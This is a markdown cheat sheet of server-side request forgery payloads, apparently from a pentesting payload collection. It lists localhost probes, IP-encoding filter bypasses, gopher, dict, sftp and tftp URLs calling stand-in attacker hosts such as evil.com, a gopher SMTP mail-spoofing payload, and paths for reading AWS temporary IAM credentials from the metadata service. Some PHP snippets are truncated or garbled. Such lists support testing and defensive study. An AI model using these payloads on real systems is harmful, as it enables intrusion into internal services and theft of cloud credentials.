# Server-Side Request Forgery Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him. ## Exploit with localhost Basic SSRF v1 ``` http://127.0.0.1:80 http://127.0.0.1:443 http://127.0.0.1:22 http://0.0.0.0:80 http://0.0.0.0:443 http://0.0.0.0:22 ``` Basic SSRF v2 ``` http://localhost:80 http://localhost:443 http://localhost:22 ``` Advanced exploit using a redirection ``` 1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com 2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 ``` Advanced exploit using type=url ``` Change "type=file" to "type=url" Paste URL in text field and hit enter Using this vulnerability users can upload images from any image URL = trigger an SSRF ``` ## Bypassing filters Bypass using HTTPS ``` https://127.0.0.1/ https://localhost/ ``` Bypass localhost with [::] ``` http://[::]:80/ http://[::]:25/ SMTP http://[::]:22/ SSH http://[::]:3128/ Squid ``` ``` http://0000::1:80/ http://0000::1:25/ SMTP http://0000::1:22/ SSH http://0000::1:3128/ Squid ``` Bypass localhost with a domain redirecting to locahost ``` http://localtest.me http://n-pn.info ``` Bypass localhost with CIDR : 127.x.x.x ``` it's a /8 http://127.127.127.127 http://127.0.1.3 http://127.0.0.0 ``` Bypass using a decimal ip location ``` http://0177.0.0.1/ http://2130706433/ = http://127.0.0.1 http://3232235521/ = http://192.168.0.1 http://3232235777/ = http://192.168.1.1 ``` Bypass using malformed urls ``` localhost:+11211aaa localhost:00011211aaaa ``` Bypass using rare address ``` http://0/ ``` Bypass using tricks combination ``` http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ urllib2 : 1.1.1.1 requests + browsers : 2.2.2.2 urllib : 3.3.3.3 ``` Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow) ``` http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com List: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ``` ## SSRF via URL Scheme Dict:// The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol: ``` dict://;@:/d::: ssrf.php?url=dict://attacker:11111/ ``` Sftp:// ``` ssrf.php?url=sftp://evil.com:11111/ ``` Tftp:// ``` ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET ``` Ldap:// ``` ssrf.php?url=ldap://localhost:11211/%0astats%0aquit ``` Gopher:// ``` ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a will make a request like HELO localhost MAIL FROM: RCPT TO: DATA From: [Hacker] To: Date: Tue, 15 Sep 2017 17:20:26 -0400 Subject: Ah Ah AH You didn't say the magic word ! . QUIT ``` Gopher:// SMTP - Back connect to 1337 ```php Content of evil.com/redirect.php: Now query it. https://example.com/?q=http://evil.com/redirect.php. ``` Gopher:// SMTP - send a mail ```php Content of evil.com/redirect.php: ', 'RCPT To: ', 'DATA', 'Subject: @sxcurity!', 'Corben was here, woot woot!', '.' ); $payload = implode('%0A', $commands); header('Location: gopher://0:25/_'.$payload); ?> ``` ## SSRF on AWS Bucket Interesting path to look for at http://169.254.169.254 ``` Always here : /latest/meta-data/{hostname,public-ipv4,...} User data (startup script for auto-scaling) : /latest/user-data Temporary AWS credentials : /latest/meta-data/iam/security-credentials/ ``` DNS record ``` http://169.254.169.254 http://metadata.nicob.net/ http://169.254.169.254.xip.io/ http://1ynrnhl.xip.io/ http://www.owasp.org.1ynrnhl.xip.io/ ``` HTTP redirect ``` Static:http://nicob.net/redir6a Dynamic:http://nicob.net/redir-http-169.254.169.254:80- ``` Alternate IP encoding ``` http://425.510.425.510/ Dotted decimal with overflow http://2852039166/ Dotless decimal http://7147006462/ Dotless decimal with overflow http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal http://0xA9FEA9FE/ Dotless hexadecimal http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow http://0251.0376.0251.0376/ Dotted octal http://0251.00376.000251.0000376/ Dotted octal with padding ``` ## Thanks to * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF) * [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648) * [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) * [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk) * [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/) * [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748) * [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/) * [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf) * [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow) * [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)